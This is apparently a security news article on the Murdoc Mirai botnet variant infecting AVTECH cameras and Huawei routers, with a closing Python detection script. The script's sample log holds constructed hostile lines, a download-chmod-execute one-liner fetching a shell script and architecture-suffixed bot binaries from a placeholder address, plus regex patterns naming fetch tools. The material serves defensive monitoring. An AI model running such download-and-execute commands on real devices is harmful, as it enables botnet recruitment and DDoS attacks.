
Cybersecurity researchers have identified a significant campaign taking advantage of vulnerabilities in AVTECH IP cameras and Huawei HG532 routers, integrating these devices into a variant of the Mirai botnet known as the Murdoc Botnet.
This ongoing effort has been active since at least July 2024, with more than 1,370 systems compromised. The majority of these infections are reported in regions including Malaysia, Mexico, Thailand, Indonesia, and Vietnam.
The botnet exploits known vulnerabilities, such as CVE-2017-17215 and CVE-2024-7029, to gain initial access to Internet of Things (IoT) devices. From there, it downloads a shell script that fetches and executes the botnet malware matching the device’s CPU architecture. The primary objective of these attacks is to use the botnet to launch distributed denial-of-service (DDoS) attacks.
This development follows the emergence of another Mirai variant named gayfemboy, which has been exploiting a recently disclosed security weakness affecting Four-Faith industrial routers since early November 2024. Earlier, in mid-2024, researchers also revealed that the CVE-2024-7029 vulnerability was being exploited to recruit AVTECH devices into a botnet.
Further complicating matters, details have surfaced regarding a large-scale DDoS campaign targeting major Japanese corporations and banks since the end of 2024. This attack utilized an IoT botnet composed of devices compromised through vulnerabilities and weak credentials. Targeted sectors include telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services. Over 55% of the affected devices were located in India, with others in South Africa, Brazil, Bangladesh, and Kenya.
The botnet comprises multiple malware variants derived from Mirai and BASHLITE. Its command capabilities include various DDoS attack methods, malware updates, and proxy services.
To mitigate these risks, it is recommended to monitor for suspicious processes, events, and network traffic stemming from the execution of any untrusted scripts or binaries. Additionally, users should apply firmware updates and change default usernames and passwords to enhance security.
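As an added illustration of the monitoring advice above (not code from the researchers or any vendor), the sketch below correlates process-execution events per host and flags the pattern the article describes: a download, a permission change and the execution of the fetched file in quick succession, with architecture-suffixed file names noted as supporting evidence. The log format, host names, file names and signal list are assumptions made for this example.

```python
import re
from collections import defaultdict

# Constructed process-execution events (hypothetical format: "epoch host command").
# Hosts, file names and addresses are made up; 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = """\
1721000000 cam-01 /bin/sh -c cd /tmp; wget http://192.0.2.10/fetch.sh; chmod 777 fetch.sh; sh fetch.sh
1721000003 cam-01 wget http://192.0.2.10/bot.arm7 -O /tmp/bot.arm7
1721000004 cam-01 wget http://192.0.2.10/bot.mips -O /tmp/bot.mips
1721000005 cam-01 chmod +x /tmp/bot.arm7
1721000006 cam-01 /tmp/bot.arm7
1721000100 nas-02 wget https://updates.example.com/firmware-2.1.bin -O /mnt/data/firmware-2.1.bin
1721000200 gw-03 chmod 644 /etc/config/network
"""

# Heuristic signals (assumed for this example, not vendor signatures).
SIGNALS = {
    "fetch": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"),
    "chmod_exec": re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]*[1357][0-7]*)\b"),
    # A script or a file in a world-writable directory run as its own command.
    "run": re.compile(r"(?:^|[;&|]\s*)(?:\./|/tmp/|/var/tmp/|/dev/shm/|(?:ba)?sh\s+)\S+"),
    # File names carrying a CPU-architecture suffix, one per build of the same payload.
    "arch": re.compile(r"\.(arm[4-7]?|mips|mpsl|x86|ppc|sh4|m68k)\b", re.I),
}
REQUIRED = {"fetch", "chmod_exec", "run"}


def detect(log, window=60):
    """Return {host: sorted signals} where fetch, chmod and run occur within `window` s."""
    seen = defaultdict(list)  # host -> [(timestamp, signal)]
    for line in log.splitlines():
        ts, host, cmd = line.split(" ", 2)
        for name, rx in SIGNALS.items():
            for m in rx.finditer(cmd):
                label = f"arch:{m.group(1).lower()}" if name == "arch" else name
                seen[host].append((int(ts), label))
    alerts = {}
    for host, hits in seen.items():
        for t0, name in hits:
            if name != "fetch":
                continue
            near = {n for t, n in hits if t0 <= t <= t0 + window}
            if REQUIRED <= near:
                alerts[host] = sorted(near)
                break
    return alerts


if __name__ == "__main__":
    for host, signals in detect(SAMPLE_LOG).items():
        print(host, signals)
```

A lone download or a non-executable `chmod` does not raise an alert, which keeps routine firmware fetches and configuration changes out of the results.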